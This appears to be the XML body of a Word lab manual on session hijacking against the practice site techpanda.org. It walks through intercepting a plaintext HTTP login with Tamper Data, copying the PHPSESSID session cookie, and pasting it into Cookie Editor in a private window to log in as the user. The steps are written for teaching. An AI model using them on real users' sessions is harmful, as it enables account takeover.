          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C56B072" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Search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13"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Tamper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Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BBDCDB" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Add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to </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2614966D" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1166"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:ind w:left="503" w:right="7306" w:firstLine="304"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Restart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Firefox </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Verification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDB9767" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000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Tools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Tamper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Data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option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visible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BEB745" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17898C23" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="6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Install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Cookie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Editor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Extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D1EBCA" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1167"/>
        </w:tabs>
        <w:spacing w:before="1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Tools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Add-</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4F6C64" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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 xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FE0128" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Search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for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Editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F4AA6" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Add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to </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185FAA88" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1167"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:ind w:left="448" w:right="7306" w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Restart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Firefox </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Verification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291DF05C" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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Cookie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Editor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icon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appears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near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 address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bar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9AC1CD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5809C125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Start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Tamper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Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09438309" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Tools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Tamper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Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E069488" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Start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Tamper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7D224F" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="508"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Firefox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now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ready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intercept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HTTP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requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249A291C" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4927ED0A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Open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Target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Website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBD789E" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="359"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:ind w:left="359" w:right="5997" w:hanging="359"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In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Firefox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address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bar,</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> open:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC91306" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:ind w:right="6092"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidRPr="00ED13DB">
          <w:rPr>
            <w:b/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>http://techpanda.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:color w:val="0462C1"/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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TechPanda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EBADEA" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Account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Log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In</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767BB096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02326EBF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Enter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Given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Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CF396D" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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Enter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exactly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDAF29A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b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mail:</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidRPr="00ED13DB">
          <w:rPr>
            <w:b/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>admin@google.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D99CCEC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Password:</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Password2010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00573E73" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E03648C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53350D20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Intercept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HTTP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Login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Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35456AAE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Tamper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Data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automatically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intercepts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request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431A57D3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A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popup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window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appears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showing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HTTP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parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A7FF7C" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:ind w:left="448" w:right="4293"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidRPr="00ED13DB">
          <w:rPr>
            <w:b/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>email=admin@google.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> password=Password2010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C011CFA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71C16FFE" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="448" w:right="4293" w:firstLine="60"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Observe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that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credentials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sent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plaintext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HTTP Click OK / Tamper to forward the request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F266ED" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="276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8: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Successful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Login</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02634B1F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User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logged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into</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-5"/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TechPanda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3645A081" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Session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now</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> active</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282B5034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20B0B57B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9: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View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Session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Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362EFA50" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Editor </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4345A59B" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Observe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such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as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A075D8" w14:textId="77777777" w:rsidR="00EF1DA9" w:rsidRDefault="00EF1DA9" w:rsidP="0061574E">
      <w:pPr>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61EEFD47" w14:textId="703385C9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lastRenderedPageBreak/>
        <w:t>PHPSESSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2877820F" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:ind w:left="448" w:right="7967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 xml:space="preserve">frontend </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>session_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0BC53732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27E3200E" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:ind w:left="3" w:right="6093"/>
        <w:jc w:val="center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10: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Copy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Session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Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5176FA" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="359"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:ind w:left="359" w:right="6165" w:hanging="359"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Copy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value </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034E3003" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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PHPSESSID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or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frontend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699498BC" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText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This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value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represents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authenticated</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01429B6F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7351B56E" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="60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11: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Open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New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Private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Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AA4170" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1167"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1167" w:right="7893" w:hanging="359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Press:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9D2A19" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:ind w:left="448" w:right="7893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Ctrl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+ Shift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+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E64D4B4" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1167"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:ind w:left="448" w:right="7358" w:firstLine="360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 xml:space="preserve">Open: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidRPr="00ED13DB">
          <w:rPr>
            <w:b/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>http://techpanda.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D40CC23" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E4573E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12: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Edit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Cookie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to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Impersonate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Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F3E187" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Open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Editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621FE97C" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Locate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session </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4D142F" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Replace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its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value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copied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session </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110C3C9F" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Save</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7E68D2" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Refresh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page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1587F797" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C321148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13: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Observe</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CDBE30" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="508" w:right="3286"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>User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logged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without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entering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username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or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password Session impersonation successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0618C5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73F11588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14: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Stop</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1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Tamper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Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D3E5B1" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Tools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→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Tamper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pacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161F5E57" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1167"/>
        </w:tabs>
        <w:spacing w:before="0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Click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Stop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Tamper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C72FB6F" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7224BB45" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="550" w:lineRule="atLeast"/>
        <w:ind w:left="448" w:right="6380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Security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Impact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 xml:space="preserve">Analysis </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
